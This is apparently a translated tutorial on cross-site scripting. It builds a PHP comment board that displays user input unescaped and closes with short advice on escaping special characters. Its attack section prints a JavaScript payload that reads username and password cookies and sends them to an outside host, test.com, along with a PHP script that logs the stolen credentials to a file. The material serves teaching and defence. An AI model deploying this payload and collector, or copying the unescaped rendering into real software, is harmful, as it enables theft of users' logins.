Cross Site Scripting (Cross Site Script is abbreviated as XSS in order to distinguish it from CSS) refers to malicious attackers inserting malicious html code into a web page. When a user browses the page, the html code embedded in the web will be executed. So as to achieve the special purpose of malicious users.
a simple message board
We have a page that allows users to post comments and then displays a list of comments at the bottom of the page
<!DOCTYPE html>
<html>
<head>
<?php include('/components/headerinclude.php');?></head>
<style type="text/css">
.comment-title{
font-size:14px;
margin: 6px 0px 2px 4px;
}
.comment-body{
font-size: 14px;
color:#ccc;
font-style: italic;
border-bottom: dashed 1px #ccc;
margin: 4px;
}
</style>
<script type="text/javascript" src="/js/cookies.js"></script>
<body>
<form method="post" action="list.php">
<div style="margin:20px;">
<div style="font-size:16px;font-weight:bold;">Your Comment</div>
<div style="padding:6px;">
Nick Name:
<br/>
<input name="name" type="text" style="width:300px;"/>
</div>
<div style="padding:6px;">
Comment:
<br/>
<textarea name="comment" style="height:100px; width:300px;"></textarea>
</div>
<div style="padding-left:230px;">
<input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
</div>
<div style="border-bottom:solid 1px #fff;margin-top:10px;">
<div style="font-size:16px;font-weight:bold;">Comments</div>
</div>
<?php
require('/components/comments.php');
if(!empty($_POST['name'])){
addElement($_POST['name'],$_POST['comment']);
}
renderComments();
?>
</div>
</form>
</body>
</html>
The addElement() method is used to add new comments, and the renderComments() method is used to display the list of comments. The web page looks like this
XSS
Because we completely trust user input, but some users with ulterior motives will input like this
In this way, no matter who visits this page, the console will output "Hey you are a fool fish!", if this is just a malicious little joke, some people do things that are not cute, and some users will use this vulnerability to steal users Information, tricking people into opening malicious websites or downloading malicious programs, etc., look at the simplest example
Use xss to steal username and password
Of course, this example is very simple, almost no website can be attacked, just see how it works. We know that many login interfaces have the function of remembering the user name and password to facilitate the user to log in next time. Some websites directly record the user name and password in plain text. After a malicious user registers an account and logs in, he uses a simple tool to view the cookie structure name. If the website There is an xss vulnerability, so simply use jsonp to obtain the username and password of other users.
Malicious users would type like this
Let's see what 's hidden in http://test.com/hack.js
var username=CookieHelper.getCookie('username').value;
var password=CookieHelper.getCookie('password').value;
var script =document.createElement('script');
script.src='http://test.com/index.php?username='+username+'&password='+password;
document.body.appendChild(script);
A few simple javascripts, get the username and password in the cookie, and use jsonp to send it to http://test.com/index.php
sent a get request
<?php
if(!empty($_GET['password'])){
$username=$_GET['username'];
$password=$_GET['password'];
try{
$path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
$fp=fopen($path,'a');
flock($fp, LOCK_EX);
fwrite($fp, "$username\t $password\r\n");
flock($fp, LOCK_UN);
fclose($fp);
}catch(Exception $e){
}
}
?>
In this way, malicious users can steal the information of users who visit the message board.
how to prevent
The above demonstration is a very simple XSS attack, and there are many hidden ways, but the core is the use of script injection, so our solution is actually very simple, do not rely on user input, special characters such as "<", " >" escape, you can fundamentally prevent this problem. Of course, many solutions have specific restrictions on XSS. For example, the above method is unfortunately different in ASP.NET. Microsoft validateRequest automatically performs XSS verification on form submission. . But there is no way to prevent it. There are always some smart malicious users who will come to our website to destroy it. If you are worried about your own site, you can check this XSS cross-site testing code to see if the site is safe.